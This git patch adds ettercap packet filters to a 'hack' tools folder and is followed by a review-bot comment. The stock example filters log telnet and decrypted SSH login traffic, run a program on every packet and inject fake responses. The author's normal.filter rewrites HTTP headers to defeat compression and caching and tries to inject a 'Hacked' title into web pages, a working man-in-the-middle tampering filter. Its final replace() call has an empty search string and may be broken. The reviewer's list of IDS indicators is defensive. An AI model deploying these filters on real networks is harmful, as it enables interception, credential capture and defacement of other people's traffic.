From a089094d5a01083ff190e51cf86e975972c81923 Mon Sep 17 00:00:00 2001
From: acevest
Date: Tue, 25 Nov 2014 20:34:53 +0800
Subject: [PATCH] add normal.filter
---
tools/hack/ettercap/etter.filter | 26 ++++++
tools/hack/ettercap/etter.filter.examples | 101 ++++++++++++++++++++++
tools/hack/ettercap/normal.filter | 21 +++++
3 files changed, 148 insertions(+)
create mode 100644 tools/hack/ettercap/etter.filter
create mode 100644 tools/hack/ettercap/etter.filter.examples
create mode 100644 tools/hack/ettercap/normal.filter
diff --git a/tools/hack/ettercap/etter.filter b/tools/hack/ettercap/etter.filter
new file mode 100644
index 0000000..002094a
--- /dev/null
+++ b/tools/hack/ettercap/etter.filter
@@ -0,0 +1,26 @@
+############################################################################
+# #
+# ettercap -- etter.filter -- filter source file #
+# #
+# Copyright (C) ALoR & NaGA #
+# #
+# This program is free software; you can redistribute it and/or modify #
+# it under the terms of the GNU General Public License as published by #
+# the Free Software Foundation; either version 2 of the License, or #
+# (at your option) any later version. #
+# #
+############################################################################
+
+##
+#
+# This filter will substitute the word 'ethercap' with 'ettercap' and
+# will log the content of the packet in /tmp/mispelled_ettercap.log
+# It is only a dummy example.
+##
+
+if (ip.proto == TCP && search(DATA.data, "ethercap") ) {
+ log(DATA.data, "/tmp/mispelled_ettercap.log");
+ replace("ethercap", "ettercap");
+ msg("Correctly substituted and logged.\n");
+}
+
diff --git a/tools/hack/ettercap/etter.filter.examples b/tools/hack/ettercap/etter.filter.examples
new file mode 100644
index 0000000..bed8dbd
--- /dev/null
+++ b/tools/hack/ettercap/etter.filter.examples
@@ -0,0 +1,101 @@
+############################################################################
+# #
+# ettercap -- etter.filter.examples -- filter source file #
+# #
+# Copyright (C) ALoR & NaGA #
+# #
+# This program is free software; you can redistribute it and/or modify #
+# it under the terms of the GNU General Public License as published by #
+# the Free Software Foundation; either version 2 of the License, or #
+# (at your option) any later version. #
+# #
+############################################################################
+
+# make sure this filter will not be used...
+exit();
+
+
+# display a message if the tcp port is 22
+if (ip.proto == TCP) {
+ if (tcp.src == 22 || tcp.dst == 22) {
+ msg("SSH packet\n");
+ }
+}
+
+
+# log all telnet traffic, also execute ./program on every packet
+if (ip.proto == TCP) {
+ if (tcp.src == 23 || tcp.dst == 23) {
+ log(DATA.data, "./logfile.log");
+ exec("./program");
+ }
+}
+
+
+# log all traffic except http
+if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) {
+ log(DATA.data, "./logfile.log");
+}
+
+
+# some operation on the payload of the packet
+if ( DATA.data + 20 == 0x4142 ) {
+ DATA.data + 20 = 0x4243;
+} else {
+ DATA.data = "modified";
+ DATA.data + 20 = 0x4445;
+}
+
+
+# drop any packet containing "ettercap"
+if (search(DECODED.data, "ettercap")) {
+ msg("some one is talking about us...\n");
+ drop();
+ kill();
+}
+
+
+# log ssh decrypted packets matching the regexp
+if (ip.proto == TCP) {
+ if (tcp.src == 22 || tcp.dst == 22) {
+ if (regex(DECODED.data, ".*login.*")) {
+ log(DECODED.data, "./decrypted_log");
+ }
+ }
+}
+
+# dying packets
+if (ip.ttl < 5) {
+ msg("The packet will die soon\n");
+}
+
+# string comparison at a given offset
+if (DATA.data + 40 == "ette") {
+ log(DATA.data, "./logfile");
+}
+
+# inject a file after a specific packet
+if (tcp.src == 21 && search(DATA.data, "root")) {
+ inject("./fake_response");
+}
+
+# replace the entire packet with another
+if (tcp.src == 23 && 
search(DATA.data, "microsoft")) {
+ drop();
+ inject("./fake_telnet");
+}
+
+# filter only a specific ip address
+if (ip.src == '192.168.0.2') {
+ drop();
+}
+
+# translate the port of the tcp packet from 80 to 81
+if (tcp.dst == 80) {
+ tcp.dst -= 1;
+ tcp.dst += 2;
+}
+
+# eof
+
+# vim:ts=3:expandtab
diff --git a/tools/hack/ettercap/normal.filter b/tools/hack/ettercap/normal.filter
new file mode 100644
index 0000000..3434524
--- /dev/null
+++ b/tools/hack/ettercap/normal.filter
@@ -0,0 +1,21 @@
+if (ip.proto == TCP && tcp.dst == 80) {
+ if (search(DATA.data, "Accept-Encoding")) {
+ replace("Accept-Encoding", "Accept-Nothing.");
+ }
+
+ if (search(DATA.data, "If-None-Match")) {
+ replace("If-None-Match", "No-None-Match");
+ }
+
+ if (search(DATA.data, "If-Modified-Since")) {
+ replace("If-Modified-Since", "No-Modified-Since");
+ }
+}
+
+if (ip.proto == TCP && tcp.src == 80) {
+ replace("keep-alive", "close");
+}
+
+if (ip.proto == TCP && tcp.src == 80) {
+ replace("", "<title>Hacked");
+}
-- 
2.44.0
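Review bot: The last block of normal.filter calls `replace("", "<title>Hacked");` with an empty search string, so the rule has no match target; whether the filter engine treats that as "match nothing" or something else is not documented here, and it looks like either a no-op or a first argument that was lost when the file was written, so the author should confirm the intent. The second and third blocks test the identical condition `ip.proto == TCP && tcp.src == 80` and could be folded into one block. Unlike the two vendored ettercap files in this commit, normal.filter has no header comment; a short one stating what the filter does, and whether it is deliberate that the three request-header rewrites keep the original length (`Accept-Encoding`/`Accept-Nothing.` 15 chars, `If-None-Match`/`No-None-Match` 13, `If-Modified-Since`/`No-Modified-Since` 17) while `keep-alive`/`close` does not, would help the next reader. From a defensive standpoint the rewritten header names `Accept-Nothing.`, `No-None-Match` and `No-Modified-Since` are distinctive strings that a proxy or IDS signature can alert on, so they are worth recording as indicators of this filter being in use.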